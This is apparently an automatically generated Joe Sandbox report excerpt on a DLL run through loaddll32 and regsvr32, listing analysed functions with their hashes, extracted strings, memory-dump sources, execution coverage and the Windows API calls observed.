Instruction Fuzzy Hash: 28917871D11319EBCB58CFA5D98A9EEBBB1FF44310F20805AE512BB290D7B41A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D31F38, Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

Ft, xrefs: 00D31FAB

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: 3069f0047465a9c194763303a9e1f1c47edbb6f122cf9a34fa4510940e167e66
Instruction ID: 14f02259021f14972b62c122c2ea1a79047278d48eabe0f127bde2166ef21623
Opcode Fuzzy Hash: 3069f0047465a9c194763303a9e1f1c47edbb6f122cf9a34fa4510940e167e66
Instruction Fuzzy Hash: 19516C7290C3018BC358DF24D88542BBBE0FBD4768F144A1DF9DAA6161D7B1CA49CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00D4E1F8, Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

>Z, xrefs: 00D4E21C

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: 62556579b93b6d8895a3a500bb9a52f020ef4c687a43a158fa4b91ab899be68e
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: E241B2726183119BC304DF29C48585BFBE1FFC8718F494A6EF889A7250D774D905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00D355FF, Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

\Lh, xrefs: 00D35706

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: c9eb216f14d7d0f33f5c419b09a3020b429ea077c975b46af5b857593cb021f5
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: FB419AB1108742CFC768CE21D88582BBBE5FFD8348F104A1DF5D552260EB75CA09CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D3E640, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

B:}I, xrefs: 00D3E6C4

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: 384dbc7bbd1087ae016e05745eab586dda1a349a0f783ec2d7919ae067f5e543
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: 7E4188B1508342DBD758CF21E98582BBBE4FBD4758F140A1DF582922A1D7B58A0D8FA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D40ABA, Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

WLX, xrefs: 00D40BA2

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: WLX
API String ID: 0-2077286540
Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction ID: 0a34b4efbc9a08cba1415fd8452dd5555f719a4d174e1bbb3525b65b280f7dc4
Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction Fuzzy Hash: 1741E0B2D0120DEBCF05DFA5D94A8EEBBB5FB48314F208159E912B7220D3B54A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D4FBDE, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

$Jx, xrefs: 00D4FCDC

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Jx
API String ID: 0-2488101295
Opcode ID: 50626a7505fd0e3553684f9399c30ebcc8b478af8f47350c9e4e3f9f46474ab9
Instruction ID: b8bb0d7342851465fe9ee5f9b97b0d74fc220174fc0b3c85f5e5484e808457c6
Opcode Fuzzy Hash: 50626a7505fd0e3553684f9399c30ebcc8b478af8f47350c9e4e3f9f46474ab9
Instruction Fuzzy Hash: CF4133B1D0021AEBDF08CFE5C98A5EEFBB1FB44318F248159D512B7250D7B85A498FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D37078, Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

'iY, xrefs: 00D37118

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 5c3bfb542cb889929b9d5837d036f8b5d39f9059cc8fb864d512a418495f8ef3
Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: 2F412672E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D515BB290D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D46187, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

^, xrefs: 00D461E6

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: aed7c95b761f3c9e59be203144b5de142068b1538d49a59da0128e206577f80c
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: 993187712093429FC718CF24958500FBBE1FBD4748F104A2DF586A2220D3B4DA1E8BE7

Uniqueness

Uniqueness Score: -1.00%

Function 00D4CAD5, Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

P/, xrefs: 00D4CB7E

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: P/
API String ID: 0-4116444305
Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction ID: 7f1e624822c4dee0c0519ef98f80065db25518c4a8a62cc704c99e6d9afde5e6
Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction Fuzzy Hash: 4931427190130AEFCF48CFA1CA0689FBBB1FF44304F108549EA26A6220C3B59B61DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00D52B09, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Wm, xrefs: 00D52BAF

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wm
API String ID: 0-1953712011
Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction ID: 3cc0ca06ffde76841856271cd6c56c94892c74813689d75d3a05ab231df08deb
Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction Fuzzy Hash: A621C071D01319EBDB599FE4D84A4EEBFB1FB00318F108699E86566250D7B50B88DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D31CA1, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: 19d7fef3ffbf923bf600d608347345b000ac39748805f22233be36a56d9920bd
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: EF5153761093029FC714DF21D88A41FBBE1FBD4B58F444A2CF19A66221D7B58A09CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00D4FF58, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8d4eabc7a54cb61cf707b53b9e1c7bfad035d08295eabb998074a080e979cd
Instruction ID: 06b1ecd9bb1eefad4539a7062c04a84fd04b52a911860a872fe3d41b335cc1f7
Opcode Fuzzy Hash: 5a8d4eabc7a54cb61cf707b53b9e1c7bfad035d08295eabb998074a080e979cd
Instruction Fuzzy Hash: 7741FE75D0122DEBCF04DFA5D94A4DEBFB2FB48314F108199D521B6220D3B90A59DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D44244, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction ID: 3c2319280bd412416ce1b64a30f4343e8d84b2b0a17f37d388ae7b5d84c44bf5
Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction Fuzzy Hash: 3F3189726093408FC305CF28C48595BFBE0FB88714F454B6DF88AA7221D774EA49CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D43D85, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: 72ccbb229bf1c7e8e2579bfb0f99c0b755251f31cc6de697e882b846bfd1f0fe
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: 26319A726093408FD718DF29C98640BBBE2FFC8718F044B2DF489A3214DB74DA058B56

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F0E9, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: 920263b8721cd2adba2405fb71fe13766616729919b5949177a56d774a60996c
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: E6212676E00209EBDF08CFE5C80A9DEBBB2EB44314F20C0AAE5146B290D7B15B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D4567B, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 9212189ff8a70a17ad10bdbd969a02812516360658dc62d2a395ef048cbcf58a
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: F8315972E00209EFDB58DFA5D88A8AEFBB1FB40314F2480A9D515B7211D3B45F558F90

Uniqueness

Uniqueness Score: -1.00%

Function 00D40EBC, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: 2cd2ee0d03a3df81e5e831630fe7751110921152ef6e2bdabcce90cb36cdc1a5
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: FD211F71801219FBCF19DFA1CD4A8CFBFB4FF18354F108688E958A2260D3798A14DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D3EF0C, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: f6aff928b710830252d0d7a9b838f4865cca45997fc5a607d7a1a368431a5df4
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: FB21E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B54B059BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D3C5D8, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: 487c1d38010b589538c8d3e875616e44028bece3a1e1e93ed624884106bffa62
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: 8721FEB5D0020DEBDF08DFE1C98A4EEBBB1BB54718F208088D525B6260D7B54B588FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F7F7, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 3408 Parent PID: 6764 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.4%
Total number of Nodes:	873
Total number of Limit Nodes:	39

Executed Functions

Function 10002D40, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1

SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88

Strings

Oxt, xrefs: 10002F36
`Nxt, xrefs: 10002E9B

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID: Oxt$`Nxt
API String ID: 1452528299-513543937
Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(02465818), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32 ref: 1002AE41
GlobalHandle.KERNEL32(02465818), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
